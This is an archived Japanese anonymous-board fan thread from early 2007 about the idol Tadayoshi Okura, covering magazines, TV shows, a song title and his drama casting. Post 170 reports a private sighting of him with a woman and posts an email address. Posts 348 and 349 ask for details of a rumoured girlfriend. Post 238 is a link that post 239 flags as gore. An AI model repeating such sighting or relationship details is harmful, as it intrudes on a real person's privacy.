169 :ユー&名無しネ:2007/01/23(火) 11:44:20 ID:2s9yrljP
ttp://page11.auctions.yahoo.co.jp/jp/auction/n46853295

ヘンリさんに隠れてるの(ry

170 :ユー&名無しネ:2007/01/23(火) 15:13:55 ID:Ut5XE8VC
目撃情報↓
☆大倉忠義☆
1/17 22:40某所にて!withモデル風な女
服装♪
ベージュ系のアウター/デニム/黒っぽぃ靴/黒の大きめ鞄/黒デカサングラス
提供します☆☆
ロッテ滝翼マーチ
764248s@agw.st
愛華∞遊希


171 :ユー&名無しネ:2007/01/23(火) 16:12:47 ID:L9AqScSs
超男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前男前

172 :ユー&名無しネ:2007/01/23(火) 19:11:49 ID:6FklPCxn
>169
それは隠れていると言うよりかぶってる

173 :ユー&名無しネ:2007/01/23(火) 20:16:34 ID:7Tu7SAsh
>170色んなとこに書きすぎそんなにマガ広めたいの?

174 :ユー&名無しネ:2007/01/23(火) 20:42:44 ID:EA9pM+14


175 :ユー&名無しネ:2007/01/23(火) 20:56:59 ID:MYThNmj7
髪型がカ○゙エかったなんて思ってないんだからヽ(`Д´)ノ

176 :ユー&名無しネ:2007/01/23(火) 21:06:00 ID:64qkgvt4
んhkで親分に負けるとはなヽ(`Д´)ノ
イエイイエイイエイでやられると敗北感が一層だ

177 :ユー&名無しネ:2007/01/23(火) 21:12:12 ID:xNp/5h1I
親分最近ほんと目に似てきたよ
クネクネするのやめてほしい

178 :ユー&名無しネ:2007/01/23(火) 21:15:20 ID:bu1BubxB
他タレ出す厨はキエロ

179 :ユー&名無しネ:2007/01/23(火) 21:25:03 ID:Xbyj0sIi
親分は昔からクネクネしてたけどな
何も知らない厨が増えたんだな

180 :ユー&名無しネ:2007/01/23(火) 21:49:14 ID:sIbJDer0
クネクネじゃない親分しか見えてなかったんなら
ある意味すごいけどな

181 :ユー&名無しネ:2007/01/24(水) 09:45:07 ID:RiQVq/DG
なるへそ♪

182 :ユー&名無しネ:2007/01/24(水) 10:14:42 ID:SyJwMA2T
親分のことは3年前ぐらいからしか知らないけど
ここ3年でクネクネ度は確実に上がってるよ

183 :ユー&名無しネ:2007/01/24(水) 11:32:41 ID:tk/QHjbW
クネクネって(w
目は女の子女の子みたいな事してんのかもしれないけど
親分はなんというか、おかまみたいなクネクネはしてないだろ(w

184 :ユー&名無しネ:2007/01/24(水) 13:58:52 ID:deqpZSRF
だから他タレとの比較はイラネ
親分は親分

185 :ユー&名無しネ:2007/01/24(水) 17:39:52 ID:cp0ZA9ko
親分はどう見てもオカマみたいなクネクネの方だぞ(w

186 :ユー&名無しネ:2007/01/24(水) 17:46:00 ID:rgi+N4rV
親分は目みたいなポジションに憧れてるんだろうな
無理だから(w

187 :ユー&名無しネ:2007/01/24(水) 18:00:34 ID:1TgdKKb6
こんなのんびりしたスレに続々と厨が湧くとはな

188 :ユー&名無しネ:2007/01/24(水) 18:32:30 ID:qewEA4uq
>187
数日スレストはデフォなのにな(w

ところで今月の歩誌の衣装が納得いかない自分はピーコでしょうか

189 :ユー&名無しネ:2007/01/24(水) 20:12:06 ID:VZ49hsKp
http://yaplog.jp/yamato_kaoru/

190 :ユー&名無しネ:2007/01/24(水) 22:30:38 ID:y+Ovr49H
連ドラ出る

191 :ユー&名無しネ:2007/01/24(水) 23:06:23 ID:TwRK1vNv
>190
つ【sage】【半角】【ソース】
ユニスレでもどこでも 空 気 嫁

192 :ユー&名無しネ:2007/01/25(木) 00:58:07 ID:ZcAaJgjx
歩誌見たけどネックレストップ返してもらったのかな
石川紺でも見たけどイマイチ自信なかったんだ

193 :ユー&名無しネ:2007/01/25(木) 06:33:43 ID:WU9Vw7tH
新しく作ってもらったってやつジャマイカ?

ナントカスペシャルってやつ


194 :ユー&名無しネ:2007/01/25(木) 13:06:58 ID:q9HJf0n8
品のよさがにじみ出てるねぇ〜
良い家庭で育ってそう

195 :ユー&名無しネ:2007/01/27(土) 10:10:45 ID:VMRzK/Rw
またスレスト
相変わらず焦らしプレーだなんて姐さん方も親分に負けないSっぷり(w
ムハハ、じんちゃんの笑いをとれてウマーですた

196 :ユー&名無しネ:2007/01/27(土) 10:41:30 ID:RLt32vaY
ただ単に話題がないだけですが

197 :ユー&名無しネ:2007/01/27(土) 12:36:40 ID:zkHOk/YS
>195
ココは姐さん方もおっとりトトロなんですん(w
ムハハ見れたたこやき姐さんウラヤマシスorz
たかじんの笑いとれるなんて成長したな(ノ∀`)

198 :ユー&名無しネ:2007/01/27(土) 13:35:00 ID:Vi5yYfTn
縁起物の時ですらスレスト気味だったよな(w
常時放置プレーな姐さん達ワロス(w

199 :ユー&名無しネ:2007/01/27(土) 14:34:31 ID:GRpYXmoh
>197
笑いを取ったというか新聞配達というバイトをたかじんに
笑われただけで本人はいつも通り何も面白い事言ってないよ(w
でもビズ良かったしよくゲラってたのでウマーだた

200 :ユー&名無しネ:2007/01/27(土) 15:33:04 ID:TUMktqtT
月刊ジョン見てきたが男優陣のカクイイ写真の中で
異彩を放つ関風ジャケ写の眉ナシ親分バロス(w
そして必ず書かれる関西人なのにスローという決まり文句

201 :ユー&名無しネ:2007/01/27(土) 15:58:10 ID:6n4VZABG
自分は親分が王子様キャラと書かれてたのに驚き
まず王子様キャラじゃないだろ(W

202 :ユー&名無しネ:2007/01/27(土) 17:03:36 ID:RBjqkjPZ
ジョンの記者は燕尾風衣裳だけ見て帰ったと予想

203 :ユー&名無しネ:2007/01/27(土) 17:13:22 ID:RKWBr0vR
>202
それだと紺のほぼすべてを見ている件
むしろソロと投げチスのサービスだけで帰ったと予想
レンジャーとMCはのアフォっぷりは見ていない

204 :ユー&名無しネ:2007/01/27(土) 17:20:03 ID:tUNLvuM9
燕尾風衣裳限定で黙ってたら王子様キャラに見えなくもないが
基本的にナルってクネクネしてるのをpgr
するのが楽しいんだな

205 :ユー&名無しネ:2007/01/27(土) 17:20:51 ID:RKWBr0vR
×MCはの
○MCの

206 :ユー&名無しネ:2007/01/27(土) 18:19:14 ID:cba6i2Td
>204
pgrなんかしませんがね

207 :ユー&名無しネ:2007/01/28(日) 00:17:00 ID:Usl4Qj65
pgrしかしませんがね
担もタレに似て℃Sですから敗北宣言はなかなかしません

208 :ユー&名無しネ:2007/01/28(日) 00:24:11 ID:ksw950fH
親分ソロ新曲クルー?
怪しい薬みたいな曲名て何なんだ
スリムドカン?

209 :ユー&名無しネ:2007/01/28(日) 00:35:56 ID:d25Gw7Cd
バイアグラ?

新曲もwktkだが
その前にバタフライのディーマイナーか円盤化ナモナモオパーイ(・人・)

210 :ユー&名無しネ:2007/01/28(日) 00:43:44 ID:vxvlczPD
バイアグラはヤバ杉る件(w
自分もバタフライの映像化(・人・)ナモナモ

211 :ユー&名無しネ:2007/01/28(日) 09:33:54 ID:MDIdFHEg
バタフライのボツネムはEXガールフレンドとかそんなんだったとオモー
新曲は是非ともクロロホルムで

212 :ユー&名無しネ:2007/01/28(日) 10:09:04 ID:2pCl52AJ
スノーキャンディー系かな?

213 :ユー&名無しネ:2007/01/28(日) 10:13:41 ID:UqAxb2xN
ヤバさがエスカレートしている件(w

214 :ユー&名無しネ:2007/01/28(日) 12:40:14 ID:Xjg28p07
許されてモルヒネだな

215 :ユー&名無しネ:2007/01/28(日) 15:05:08 ID:+JsIM2hW
エンジェルダストとか

216 :ユー&名無しネ:2007/01/28(日) 15:21:08 ID:pSaooPJw
ホルマリンしか思いつかない

217 :ユー&名無しネ:2007/01/28(日) 15:52:12 ID:kFqT2NHo
ホウ酸団子

218 :ユー&名無しネ:2007/01/28(日) 16:06:02 ID:Eyt8lwqJ
ヘンプ

219 :ユー&名無しネ:2007/01/28(日) 16:12:00 ID:qQhmKERC
LSD

220 :ユー&名無しネ:2007/01/28(日) 18:00:54 ID:MDIdFHEg
今日は回ってるなぁと思って覗いてみたら・・・
何盛り上がってんの姐さん方(w

221 :ユー&名無しネ:2007/01/28(日) 21:24:41 ID:kdNnyHjs
>220
つ…

222 :ユー&名無しネ:2007/01/28(日) 21:32:09 ID:IcgpP/ZM
ハッシシ

223 :ユー&名無しネ:2007/01/28(日) 23:14:19 ID:8wNTdaMJ
すさん

224 :ユー&名無しネ:2007/01/29(月) 01:32:47 ID:Uzl3n4A1
バタフライボツネムのEXガール(?)に対して
怪しい薬みたいな名前って言ってたような

225 :ユー&名無しネ:2007/01/29(月) 01:53:14 ID:MCA5w1JG
ここはひとつヒロポンで(w

226 :ユー&名無しネ:2007/01/29(月) 01:53:47 ID:zmApD/ZO
バファリン

227 :ユー&名無しネ:2007/01/29(月) 02:44:17 ID:ARBNM9Rb
>224
姐さんたちはネタ遊びで楽しんでるが(w
バタフライ以外の新曲ができたわけではナスってことでオゲ?

228 :ユー&名無しネ:2007/01/29(月) 03:28:39 ID:foIu7BxI
>227
オゲ
(`ヽ´)バタフライは最初Exガールフレンドっていう題名で…
    なんかぁピンとこーへんなって
(´∀`)なんか怪しい薬みたいやな

229 :ユー&名無しネ:2007/01/29(月) 23:42:43 ID:anABYYll
>225が年齢詐称していると考えられる件(w

EXガールフレンドのEXってなんなんだ親分

230 :ユー&名無しネ:2007/01/29(月) 23:51:30 ID:W8z58hRQ
セックルガールフレンドではないんだよな?(ノ∀`)

231 :ユー&名無しネ:2007/01/29(月) 23:57:45 ID:4Y/iVEKk
exガールフレンドって前カノって意味だお
イーエックスガールフレンドじゃなくて、エクスガールフレンド

でしゃばりスマソ

232 :ユー&名無しネ:2007/01/30(火) 00:28:45 ID:RBnTO1CM
>231
元って意味のEXか
てっきりexampleかと思ってたよ
歌詞の内容から分かってはいたけど失恋曲確定だな(*´д`*)ハァハァ
しかも未練タラタラ(*´д`*)ハァハァ

これは捨てておきますね 
つお 

233 :ユー&名無しネ:2007/01/30(火) 15:12:14 ID:gRj5Ckui
次号テレライ
芋親分対談wkwk

234 :ユー&名無しネ:2007/01/30(火) 21:47:12 ID:xW09+KhC
ttp://d.hatena.ne.jp/sakumayu/
佐久間麻由のブログ

安田との関係ありなキーワードいっぱい
・RIZE
・トリッキー

235 :ユー&名無しネ:2007/01/31(水) 00:54:37 ID:32g8d8EJ
(#`ヽ´#)守ってくれなきゃヤダ

236 :ユー&名無しネ:2007/01/31(水) 01:15:13 ID:1D9LbUnv
ここの姐さんは親分に似て℃Sが多いからな


237 :ユー&名無しネ:2007/01/31(水) 17:38:03 ID:pbBHCBhg
りだりだっ(´▽`)あれはあたしの歌だよっ

238 :ユー&名無しネ:2007/02/01(木) 05:45:14 ID:Hk591S82
今朝のスポーツ紙にこんな記事がぁりました
http://e.pic.to/3dxnw

239 :ユー&名無しネ:2007/02/01(木) 07:57:49 ID:daAdXBCC
↑グロ注意

240 :ユー&名無しネ:2007/02/01(木) 13:04:57 ID:j/76z/Lq
ex.ガールフレンドて親分が歌詞を付ける前の歌詞に付いてたタイトルかとオモタが
親分が自分でボツにしたタイトルってことでオゲ?
聴いてはいたが電波ワルーで自信ナス

241 :ユー&名無しネ:2007/02/01(木) 18:26:18 ID:YoSBsB73
何かの仕事が決まったんだな
wktkだ

242 :ユー&名無しネ:2007/02/01(木) 18:39:08 ID:uHFa3nJ7
ツルツルテカテカの親分wktk
忙しくなりそうなのもwktk

243 :ユー&名無しネ:2007/02/01(木) 22:01:48 ID:L3TRz2Mo
本の親分ピエールタンのマジックで「ピエール瀧位スゴイ」って言ってるな
スゴさが分かりにくいよ親分(w

244 :ユー&名無しネ:2007/02/03(土) 09:18:10 ID:SbD+8CT9
ピエール瀧はスッゴイぞ
シャングリラだ

しかしあそこまで新しい仕事を臭わせて
ヲタをソワソワさせるなんて親分てばヤパーリ℃S
あの言い方は単発仕事じゃなさそうだよな

245 :ユー&名無しネ:2007/02/03(土) 09:33:55 ID:8CGItEbq
ピエール瀧はミラクルさんだしな(w

今年もだから継続的な仕事じゃないかと期待
ハピョーまでwktkで待つよ

246 :ユー&名無しネ:2007/02/03(土) 11:07:22 ID:MR1QO9Zm
なにかしら仕事が決まったのは確実みたいだしな
自分も公式発表までwktkして待とう

247 :ユー&名無しネ:2007/02/04(日) 20:13:27 ID:ucxHtA53

      ☆ チン     マチクタビレタ〜
                        マチクタビレタ〜
       ☆ チン  〃  ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        ヽ ___\(\・∀・) < お仕事ハピョーまだ〜?
            \_/⊂ ⊂_ )   \_____________
          / ̄ ̄ ̄ ̄ ̄ ̄ /|
       | ̄ ̄ ̄ ̄ ̄ ̄ ̄|  |    
       |  愛媛みかん |/

シャワーシーンマダー?チッスシーンマダー?濡れ場マダー?


248 :ユー&名無しネ:2007/02/06(火) 21:51:54 ID:BVoWQfo7
大河の篤姫ってマジ?

249 :ユー&名無しネ:2007/02/07(水) 03:45:28 ID:DHmvmZ6Z
厨の妄想力には負けた

250 :ユー&名無しネ:2007/02/07(水) 04:10:36 ID:DUTWNT/Z
大河は完全にネタだがんhkドラマには出てみてホスィ
んhkは給料は安いし時間も拘束されるらしいが
演技指導が厳しいので有名だしな
夢男達までは演技はモニョモニョだったが演舞城で外部の演技指導受けたら
少し演技のレベル上がったしそういう勉強ができる機会を与えてホスィ

251 :ユー&名無しネ:2007/02/07(水) 18:37:38 ID:zGZYwmP5
片目誌こぼれ話のネクタイ短い親分ワロス
まだ結ぶのニガテなのか

252 :ユー&名無しネ:2007/02/08(木) 23:17:06 ID:GSxGyRUX
親分が妄想から無事に帰って来れることを
祈るのみだな今週は

253 :ユー&名無しネ:2007/02/09(金) 13:39:25 ID:rbsrGSPQ
今日、京都で親分見たよ

254 :ユー&名無しネ:2007/02/10(土) 15:43:57 ID:c33d7SvL
人稲
ストカー(゚听)イラネ

255 :ユー&名無しネ:2007/02/10(土) 15:51:47 ID:n80OhSP5
片目誌の親分のぷっくり下唇を人差し指でつんつんしたい

256 :ユー&名無しネ:2007/02/10(土) 23:57:51 ID:MOva3+Br
ここの姐さんたちは親分が雑誌に出ようがテレビに出ようが
反応を示さない時があるからな(w

セブンを見てオモタけどやっぱり親分は自然体で笑ってる方がモヘ
狙ってるセクチーも毎回敗北してるからスチだが

257 :ユー&名無しネ:2007/02/11(日) 12:00:17 ID:smSb80E5
>セブン
あんな感じの笑顔ショットて少ないよな
あれはテラカコヨス

258 :ユー&名無しネ:2007/02/11(日) 14:13:00 ID:heBhv2Eo
同じ屈託のない笑顔でも、昔と違ってカバエさの中に男らしさというか色気が感じられる
何か成長したなあと思った

259 :ユー&名無しネ:2007/02/11(日) 20:59:50 ID:30bF0jZy
20になった途端少年らしさが抜けたよな
だからたまに見せる無邪気な笑顔にハァ━━━━*´Д(ry

260 :ユー&名無しネ:2007/02/12(月) 05:21:41 ID:wKkovAxV
親分デラマ必殺仕事人ケテーイ

261 :ユー&名無しネ:2007/02/12(月) 06:34:58 ID:2KL8dbPP
親分オメ
ttp://www.sanspo.com/geino/top/gt200702/gt2007021201.html

262 :ユー&名無しネ:2007/02/12(月) 06:53:53 ID:fVusy2dU
仕事人ktkr

263 :ユー&名無しネ:2007/02/12(月) 11:00:40 ID:fEsYMfMS
必殺親分キタ━━━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(゚ )━(∀゚ )━(゚∀゚)━━━!!!!!
wktkがとまらない


264 :ユー&名無しネ:2007/02/12(月) 11:29:15 ID:K8ivZcqs
親分オメ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・* !!!!!
wktkしすぎて亜qwせdrftgyふじこlp;@:

265 :ユー&名無しネ:2007/02/12(月) 12:00:12 ID:FfZhPj5k
親分デラマオメ━━━━(゚∀゚(´Д`(゚レ゚(´д`・(`д´(‘Д‘. (´∀`)━━━━!!!!
からくり仕掛け人ってとこに何かワロス
今からwktkすぎて吐きそう

266 :ユー&名無しネ:2007/02/12(月) 13:27:22 ID:VmW9l22f
親分必殺オメ━━━━(*゚∀゚*)━━━━!!!!!
まことと共演wktk

267 :ユー&名無しネ:2007/02/12(月) 13:29:41 ID:sySTx2nv
親分よ
ヒヨのこと忘れないでくれよorz

268 :ユー&名無しネ:2007/02/12(月) 13:32:15 ID:Uu/kq1iu
そんなに素直に喜べるか?
私には無理…

269 :ユー&名無しネ:2007/02/12(月) 13:36:59 ID:0ZWbm1mU
>268
巣におかえり

270 :ユー&名無しネ:2007/02/12(月) 18:14:21 ID:SwILbY6J
親分オメ!
必殺で親分が見られる日が来るとは
源太のキャラもwktkだな

271 :ユー&名無しネ:2007/02/12(月) 19:36:00 ID:4A1uHvN7
>>263
> 必殺親分キタ━━━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(゚ )━(∀゚ )━(゚∀゚)━━━!!!!!
> wktkがとまらない


272 :ユー&名無しネ:2007/02/12(月) 21:51:16 ID:iDrIh8jg
デラマサイト見ると改めてこの本名でヨカッタと実感
どう見てもベテラン時代劇俳優だよな(w

273 :ユー&名無しネ:2007/02/12(月) 23:01:37 ID:aXcgETGh
>272
確かに(w
全く名前負けしてないな
心からタダシに感謝=∞

274 :ユー&名無しネ:2007/02/12(月) 23:58:02 ID:VAjijPL8
名前だけは負けてないの間違いジャマイカ?
どっちにしろタダシに感謝=∞には違いないが
親分、名前負けしないようガンガレ!

275 :ユー&名無しネ:2007/02/13(火) 00:48:11 ID:Kd0wdJZQ
みやうちタソの夢に環八登場(w

276 :ユー&名無しネ:2007/02/13(火) 00:49:34 ID:Kd0wdJZQ
書くとこ間違えたorz

277 :ユー&名無しネ:2007/02/13(火) 01:32:52 ID:z07vz535
会見映像見たがハキーリした口調でしゃべるようになったよな
昔に比べると
駄菓子菓子もう少しおもしろいことを言えるようになれ

278 :ユー&名無しネ:2007/02/13(火) 03:15:59 ID:IWikZA0+
かっこつけて笑いもとって歌もダンスもドラムもやって
カレーと天丼を一緒に食べて
本当に$って大変だな

279 :ユー&名無しネ:2007/02/13(火) 07:41:13 ID:Akbtr7Fp
>278
カレーと天丼は(w

まあウマイこと笑いとる親分なんて想像もつかないがな
まことポジ狙いたいなんて言えるようになっただけ
成長と思えるのは甘杉だろうか

280 :ユー&名無しネ:2007/02/13(火) 12:53:35 ID:pL99MVqH
カレーと天丼を一緒に食うのは$業務の一環なのか(w
>279
ノシ

281 :ユー&名無しネ:2007/02/13(火) 12:55:00 ID:0w57nA/z
テレライ
破顔芋に髪結い親分

…親分のコンタクトってソフト?

俺はいっぱい見つめてほしい
(`ヽ´)…(うっとうしそうに絶句)

282 :ユー&名無しネ:2007/02/13(火) 17:17:52 ID:p+w+ecSZ
>280
食$としては最も重要な業務です

283 :ユー&名無しネ:2007/02/13(火) 18:32:44 ID:Mm59eXkZ
アンカーくらいつけようぜ

284 :ユー&名無しネ:2007/02/13(火) 20:56:50 ID:ektpBBEY
>283
全角くらいやめようぜ
もしくは巣にお帰りなされ


285 :ユー&名無しネ:2007/02/14(水) 01:18:37 ID:hoD22Qke
スカ親分冴えてたなGJ!

286 :ユー&名無しネ:2007/02/14(水) 11:18:39 ID:riCVPk3d
スカの親分に何かが舞い降りてた件

287 :ユー&名無しネ:2007/02/14(水) 12:42:18 ID:sLdEhfz4
>286
ドラゴン

288 :ユー&名無しネ:2007/02/14(水) 19:11:43 ID:6clPhlp7
>287
山田く〜ん、一枚持ってきて

289 :ユー&名無しネ:2007/02/15(木) 02:14:49 ID:DaBHFg73
http://img173.auctions.yahoo.co.jp/users/7/6/2/7/pjjps406-img410x580-1171377453img705.jpg

290 :ユー&名無しネ:2007/02/15(木) 23:50:44 ID:tE/XUFb3
>281
×芋
○班長

個人スレではユニスレ用語使わないで
他にも色々おかしいからあと半年ロムってね

291 :ユー&名無しネ:2007/02/17(土) 17:56:57 ID:sUQeQ62F
他担ですが失礼します
今回の親分レンジャーでは随分お世話になりました(w
親分スチなのでいつか2人の絡みを見れることをキボンしてます
チラ裏だったらスマソでしたノシ


292 :ユー&名無しネ:2007/02/17(土) 19:29:56 ID:nfgGRY4b
>291
ジャジャマル君つまりは爺担姐さんかな?
いらっさいませノシ
こちらこそニョキニョキパクってしまった様で申し訳(w

293 :ユー&名無しネ:2007/02/17(土) 20:20:18 ID:m4Ee7HqO
>291
いらっさい
ニョキニョキは爺からパクったのか(w
仲良さそうでホッコリですん

294 :ユー&名無しネ:2007/02/17(土) 22:56:04 ID:tu6A9xkF
>293
ニョキニョキ以外にも所々パクってるから
爺連載と照らし合わせるといっそう笑えるぞ(w

295 :ユー&名無しネ:2007/02/18(日) 01:01:07 ID:qp78f1j3
最後にやっぱりおならがプーで爺のネタを汚してるしな(w
デッカイ赤子をかまってあげてよ爺

296 :ユー&名無しネ:2007/02/18(日) 01:15:37 ID:lJbC61nX
ジャジャマル君って爺って2ネムに変わったのか?
カツンのユニスレ語だとオモってた

297 :ユー&名無しネ:2007/02/18(日) 01:56:24 ID:XCy4gJ4n
ジャジャマルは環八ユニスレ語だよ
2ネムは○

298 :ユー&名無しネ:2007/02/18(日) 02:41:25 ID:2+JuQ/Kd
工エエェェ(´д`)ェェエエ工工
そんな立派でシンプルな2ネムあったのか(w
他ユニの2ネム復習しにいってくる

299 :ユー&名無しネ:2007/02/18(日) 08:49:34 ID:EoUiyKtw
>298
ノシ

300 :ユー&名無しネ:2007/02/18(日) 09:47:56 ID:IFknA9uI
2ネムは爺でしょ?
○は昔々で今は使ってたら浮くと思うよ

301 :ユー&名無しネ:2007/02/18(日) 12:44:12 ID:N0NYNJnC
ムーブイケメン塾のヤマザキさんのブログに親分の事書いてある
放送日未定だが干菓子紫親分のインタブ流れるモヨン

302 :ユー&名無しネ:2007/02/18(日) 14:04:30 ID:P6IpcZoR
>300
ジャジャマル君個人スレでは現在進行形で○タソと呼ばれている件

303 :ユー&名無しネ:2007/02/18(日) 14:45:21 ID:tKWbmgTZ
>301
d!見てきた
>2人の大先輩との共演に緊張気味の大倉くんでしたが2人の先輩からは大絶賛!
いろいろな面で褒められていましたよ(^-^)

インタブwktk 


304 :ユー&名無しネ:2007/02/18(日) 15:38:05 ID:n3zZHbaT
>301
d
河川敷で悪党と戦う親分wktk

305 :ユー&名無しネ:2007/02/18(日) 16:01:28 ID:n8A35gOC
仕事人は昼間から悪党とは戦わないだろう
昼の顔と夜の顔が違うのが仕事人

306 :ユー&名無しネ:2007/02/18(日) 20:39:27 ID:ZB6w/sus
まるで親分そのも(ry

307 :ユー&名無しネ:2007/02/19(月) 03:34:57 ID:GVeSC4hp
昼は食$
夜は構ってチャソだもんな

308 :ユー&名無しネ:2007/02/19(月) 03:38:09 ID:afQMBGK1
本人は夜は熊とおっしゃってましたが(w

309 :ユー&名無しネ:2007/02/19(月) 13:44:36 ID:o3nmd3pg
どうせリラックマだろ

310 :ユー&名無しネ:2007/02/19(月) 17:49:19 ID:ox8I9oWv
いや、たれパンダかも

311 :ユー&名無しネ:2007/02/19(月) 19:42:59 ID:1tTmZ21e
「ぼくはくま」

312 :ユー&名無しネ:2007/02/20(火) 03:19:10 ID:G80848ky
どうせリラックマテラワロス
似たようなもんだな(w

313 :ユー&名無しネ:2007/02/20(火) 07:31:05 ID:AAC2DA1+
背中にチャックあるという説が信憑性を帯びてきたな(w

314 :ユー&名無しネ:2007/02/20(火) 13:21:27 ID:+/WulIVS
チャック開けたらもう一体のそーっと出てきそうだよな
最近長髪率が高いのはチャック隠すためか親分

315 :ユー&名無しネ:2007/02/20(火) 13:45:57 ID:nIgiR6MD
餡子でも絶対裸にならないしな

316 :ユー&名無しネ:2007/02/20(火) 20:44:27 ID:KrgIZQwe
関風コン石川で脱いでたぞ

317 :ユー&名無しネ:2007/02/20(火) 21:27:34 ID:+/WulIVS
福岡ラストの餡子でも脱いでた
本編終わって楽屋で脱皮してきた後だったんだな

318 :ユー&名無しネ:2007/02/20(火) 22:49:51 ID:OU2btPaf
みのむしは蓑も虫も揃ってこそのみのむし
外見中身揃ってこその親分だ

319 :ユー&名無しネ:2007/02/21(水) 00:06:41 ID:jSAA/cHW
>318が美しくまとめてくれたところで

320 :ユー&名無しネ:2007/02/21(水) 01:14:23 ID:WJqQhRDW
親分のスチなところ古今東西ゲーム!

ヒヨコ本スレのパクリ(w

321 :ユー&名無しネ:2007/02/21(水) 01:19:01 ID:+EHS6fsY
みのむしって蛾の幼虫だろ
例えが美しくない (ノ∀`)

322 :ユー&名無しネ:2007/02/21(水) 01:24:14 ID:cwbiJk54
美しい美しくないって小分けするのはイクナイ!
蓑虫はこれからなにかになるものって可能性のイメージだから嫌いじゃない

323 :ユー&名無しネ:2007/02/21(水) 01:32:41 ID:SutEMhTh
蓑虫といえば城を思い出すな

324 :ユー&名無しネ:2007/02/21(水) 02:50:45 ID:vblYhi/Y
ずっと気になってたんだが親分は何で収録中に水を飲むんだ?
ゲストが話してる時とかに飲んでるのよく見る
なんか見てて不快だ
ほとんど喋ってないんだから収録の合間に済ませてくれ
常に水飲んでないと死ぬ病にかかってるなら仕方ないが

325 :ユー&名無しネ:2007/02/21(水) 06:09:26 ID:Cy1k5wOK
>>324
気付かなかったが、なんつーんだろ、ロケ中やコントん時も平気でフレームアウトしてたり
基本的にTV映り考えてなさそうなあの無欲さが魅力にも思えてしまうのだが。
でもゲストに対して失礼に見えたらヒヤヒヤするのはわかる。

326 :ユー&名無しネ:2007/02/21(水) 08:02:21 ID:TPB8Y7rR
>325
消えてねハイパー

327 :ユー&名無しネ:2007/02/21(水) 10:43:25 ID:hnkrB7O3
ジョングラビアの親分の裾がひっかかってるのはワザとじゃないよな(w

328 :ユー&名無しネ:2007/02/21(水) 10:52:11 ID:+PQCx9JQ
>324
イチゴやお菓子食べるわけにもいかないからな
水で我慢してるんだろ(w

329 :ユー&名無しネ:2007/02/21(水) 12:41:14 ID:jSAA/cHW
親分の胃袋は時として無限大になるから

330 :ユー&名無しネ:2007/02/21(水) 14:30:02 ID:9H11yjJH
>324
自分も気になってた
親分だけなのがまた辛い
基本的に一般常識がないよな

331 :ユー&名無しネ:2007/02/21(水) 16:42:27 ID:8HZl6fNF
ここで吐き出すよりスカにお手紙でも書いた方が
確実にその不快感は本人へと伝わりますよ

332 :ユー&名無しネ:2007/02/21(水) 19:53:47 ID:9H11yjJH
マンセー意見以外にはとげのある言い方しかできないのか
スカにお手紙書いてくるよ

333 :ユー&名無しネ:2007/02/21(水) 19:55:45 ID:g/hoXSix
口が渇きやすいとかではないのかな
そういう人は大抵の場合ガム噛んだりアメちゃん舐めたりするんだが、さすがにそういう訳にもいかないだろうし
時々気になる行動はあるけど、そんなに非常識な印象はないかな自分は

334 :ユー&名無しネ:2007/02/21(水) 20:13:29 ID:hnkrB7O3
>332
どうぞお好きなように
いちいちご報告頂かなくても結構ですよ

335 :ユー&名無しネ:2007/02/21(水) 20:35:05 ID:vblYhi/Y
リアかよ(w

336 :ユー&名無しネ:2007/02/21(水) 21:06:50 ID:jYcfbAvo
こんな流れの時にアレなんだが…
暇つぶしに過去ログ読み返してたら
ツンデレラ主演が分かってガクブルした日からちょうど一年なんだな
改めて振り返ると濃い一年だったし
親分も成長したよなと思ってシジミハマグリ食べました

337 :ユー&名無しネ:2007/02/21(水) 22:31:21 ID:SI2GgbWw
>336
食べたのかバロス(w

振り返ると一年でもずいぶん懐かしいもんだな
変わったところもあれば変わらないところもある
親分のチト世間知らずっぽい部分もモヘ要素ではあるが
不特定多数が見ることを考えられるようになればイイな

338 :ユー&名無しネ:2007/02/21(水) 23:20:33 ID:NcKVs3Rs
>337
もとはそんな事気にしなくても良い位置にいた人間なんだから
これからの成長を願うよ
おかしな事をしたら叱ってくれる年上面もユニにはいるしな

それよりガイドの寝転がり親分の手の置き場所と
仕事人には源太の由美かおる的な入浴シーンはないのかが気になるよ

339 :ユー&名無しネ:2007/02/21(水) 23:25:02 ID:/4VBfi1C
入浴シーンで何万の姐さんが妊娠するかな

340 :ユー&名無しネ:2007/02/22(木) 00:12:45 ID:7HZ3uy3k
>339親分
自演乙

341 :ユー&名無しネ:2007/02/22(木) 01:09:19 ID:GFdPDrvm
まさか親分が干菓子様紫兄さんと呑みにいかせて貰える日が来るなんて
しかも干菓子様にあんなに誉めて貰えるなんて

342 :ユー&名無しネ:2007/02/22(木) 04:29:40 ID:92k+KU0w
親分て飲んでも顔に出なさそうな感じだよな
顔が赤くなったり反応が出ないと酔ってないと思われて
どんどん酒を注がれて強くなる一方なんだよな

343 :ユー&名無しネ:2007/02/22(木) 08:06:37 ID:ROepueYw
干菓子様をガクブルさせるドラム二人ワロス
親分おじいちゃん(not譲りの酒の強さで良かったな

344 :ユー&名無しネ:2007/02/22(木) 16:51:00 ID:oYMgyema
姐さんがたスマナイ_| ̄|〇
御干菓子様が親分を褒めちぎったのは何処でござるか

345 :ユー&名無しネ:2007/02/22(木) 16:53:42 ID:c1FS4HHh

ちぎってるって程ではないが

346 :ユー&名無しネ:2007/02/22(木) 17:10:06 ID:HS0Qr+hN
セブンの後ろから2P目くらいに源太ktkr
まこと楽しみだよまこと

347 :ユー&名無しネ:2007/02/22(木) 17:14:03 ID:oYMgyema
345姐さんdです
こうやって先輩方に知ってもらい、仕事プラベ共に
引き回してもらえるようになっていくのはウレチイデスネ

348 :ユー&名無しネ:2007/02/22(木) 17:44:19 ID:ZlWFZIkI
大倉の彼女アイって子詳細求む



349 :ユー&名無しネ:2007/02/22(木) 17:47:01 ID:ZlWFZIkI
大倉の彼女アイって子詳細求む



350 :ユー&名無しネ:2007/02/22(木) 21:17:39 ID:6yGLjKKp
>347
もうちょっとロムってくれまいか

351 :ユー&名無しネ:2007/02/23(金) 02:50:47 ID:lsxgUSWn
あの書き方だと次の仕事決まってるなとエスパった自分は贅沢者

352 :ユー&名無しネ:2007/02/23(金) 14:09:33 ID:VBYKnhfp
